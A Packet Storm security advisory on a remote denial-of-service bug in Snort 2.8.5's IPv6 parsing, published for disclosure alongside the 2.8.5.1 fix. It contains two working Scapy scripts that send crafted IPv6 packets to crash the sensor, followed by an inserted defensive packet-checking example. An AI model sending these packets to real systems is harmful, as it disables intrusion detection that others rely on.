Snort 2.8.5 IPv6 Remote Denial Of Service

2009-10-23T00:00:00
ID PACKETSTORM:82149
Type packetstorm
Reporter laurent gaffie
Modified 2009-10-23T00:00:00

Description

                                        
`=============================================  
- Date: October 22nd, 2009  
- Discovered by: Laurent Gaffié  
- Severity: Low  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Snort <= 2.8.5 IPv6 Remote DoS  
  
  
II. DESCRIPTION  
-------------------------  
A remote DoS was present in Snort 2.8.5 when parsing certain specially  
crafted IPv6 packets.  
To trigger these bugs, Snort must have been compiled with the  
--enable-ipv6 option and be running in verbose mode (-v).  
  
III. PROOF OF CONCEPT  
-------------------------  
You can easily reproduce these two different bugs using the Python  
low-level networking library Scapy  
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)  
  
1) #only works on x86  
  
#!/usr/bin/env python  
from scapy.all import *  
u = "\x92"+"\x02" * 6  
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP  
  
2) # works x86,x64  
  
#!/usr/bin/env python  
from scapy.all import *  
  
z = "Q" * 30  
# nh1 -> icmp (not v6)  
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z)  
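
Both proof-of-concept packets carry an IPv6 next-header value that the payload does not match: a 7-byte payload labelled TCP, and ICMP (protocol 1) carried over IPv6. The sketch below is an added example, not part of the original advisory and not Snort's fix: a Python sanity check that flags those two shapes in a raw IPv6 packet. The names `check_ipv6`, `sample` and `SAMPLES` and the sample packets are constructed here, and the advisory does not state the root cause inside Snort.

```python
import struct

IPV6_HDR_LEN = 40
EXT_HDRS = {0, 43, 60}              # hop-by-hop, routing, destination options
MIN_L4_LEN = {6: 20, 17: 8, 58: 4}  # TCP, UDP, ICMPv6 minimum header sizes
IPV4_ONLY = {1: "ICMPv4"}           # has no meaning as an IPv6 next header

def check_ipv6(pkt):
    """Return anomaly strings for one raw packet starting at the IPv6 header."""
    if len(pkt) < IPV6_HDR_LEN:
        return ["truncated IPv6 header"]
    vtf, plen, nh, _hlim = struct.unpack("!IHBB", pkt[:8])
    if vtf >> 28 != 6:
        return ["version field is not 6"]
    findings = []
    rest = pkt[IPV6_HDR_LEN:]
    if plen != len(rest):
        findings.append("payload length %d != %d bytes present" % (plen, len(rest)))
    # Walk extension headers: byte 0 is the next header, byte 1 the length
    # in 8-byte units minus one. A fragment header (44) ends the walk unchecked.
    while nh in EXT_HDRS:
        if len(rest) < 2 or len(rest) < (rest[1] + 1) * 8:
            return findings + ["extension header %d truncated" % nh]
        nh, rest = rest[0], rest[(rest[1] + 1) * 8:]
    if nh in IPV4_ONLY:
        findings.append("next header %d (%s) is IPv4-only" % (nh, IPV4_ONLY[nh]))
    need = MIN_L4_LEN.get(nh)
    if need is not None and len(rest) < need:
        findings.append("next header %d needs %d bytes, only %d present" % (nh, need, len(rest)))
    return findings

def sample(nh, payload):
    """Constructed test packet between two documentation-range addresses."""
    src = bytes.fromhex("20010db8" + "00" * 11 + "01")
    dst = bytes.fromhex("20010db8" + "00" * 11 + "02")
    return struct.pack("!IHBB", 0x60000000, len(payload), nh, 64) + src + dst + payload

SAMPLES = {  # all constructed, zero-filled payloads
    "udp_ok": sample(17, bytes(8)),
    "tcp_short": sample(6, bytes(7)),
    "icmpv4": sample(1, bytes(30)),
    "hbh_then_tcp_short": sample(0, bytes([6, 0]) + bytes(6) + bytes(7)),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, check_ipv6(pkt) or "ok")
```

The same two conditions can be expressed as pre-decode drop rules or as a capture filter when triaging sensors that still run 2.8.5 with IPv6 support and verbose output enabled.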
  
  
IV. SYSTEMS AFFECTED  
-------------------------  
These proofs of concept have been tested on Snort:  
- 2.8.5  
  
V. NOT AFFECTED  
-------------------------  
Sourcefire 3D Sensor  
  
  
VI. SOLUTION  
-------------------------  
A new version correcting these issues has been released (2.8.5.1):  
  
http://www.snort.org/downloads  
  
  
VII. REFERENCES  
-------------------------  
http://www.snort.org/  
http://vrt-sourcefire.blogspot.com/  
  
VIII. REVISION HISTORY  
-------------------------  
October 14th, 2009: First issue discovered, advisory sent to the Snort team.  
October 14th, 2009: Snort security team confirmed the bug.  
October 16th, 2009: Second issue discovered, advisory sent to the Snort team.  
October 20th, 2009: Snort security team confirmed the bug.  
October 22nd, 2009: Snort team released a new version.  
  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered by Laurent Gaffié  
Laurent.gaffie{remove-this}(at)gmail.com  
`